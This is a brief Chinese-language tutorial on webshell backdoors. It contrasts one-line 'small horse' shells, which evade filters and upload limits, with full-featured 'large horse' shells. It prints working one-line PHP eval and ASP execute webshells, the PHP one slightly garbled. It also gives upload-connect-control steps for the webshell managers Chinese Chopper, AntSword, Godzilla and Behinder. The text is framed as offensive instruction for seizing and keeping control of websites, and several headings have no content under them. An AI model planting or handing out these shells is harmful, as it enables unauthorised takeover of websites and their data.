webshell

webshell分类


小马:
功能简单，需要配合客户端使用;代码量通常在一行左右，不超过10行;隐蔽性强，容易通过变形隐藏特征，绕过过滤。

大码:
功能完善，直接使用浏览器即可利用，代码量通常较大，隐蔽性相对较弱，代码量大，通常需要通过加密等方式来隐藏特征。



使用说明:
小马和大马都是网页类型中的一种后门，是通过用来控制网站权限的，那最主要的区别就是小马是用来上传大马的。通过小马上传大马，这时候有个疑问了，那不是多此一举了，为什么要用小马来上传大马，而干嘛不直接上传大马用好了。其实这里是因为小马体积小，有比大马更强的隐蔽优势，而且有针对文件大小上传限制的漏洞，所以才有小马，小马也通常用来做留备用后门等



小码类别:
php小码:
<?php @eval($ POST['a ])?>asp小码:
<%execute(request("a"))%>jsp、.net等。


大码类别:
php大马代码:



页面展示：


ASP大马

页面展示


webshel利用工具
菜刀
1.上传小马到网站
2.利用菜刀连接小马
3.管理网站





蚁剑-需要初始化后使用
1.上传小码到网站
2.利用蚁剑连接小码
3.操控网站





哥斯拉-需要java环境运行
1.生成木马文件并上传到网站
2.利用哥斯拉连接木码
3.管理网站





冰蝎-需要java环境运行
1.上传server目录中的木码到网站
2.利用冰蝎连接木码
3.管理网站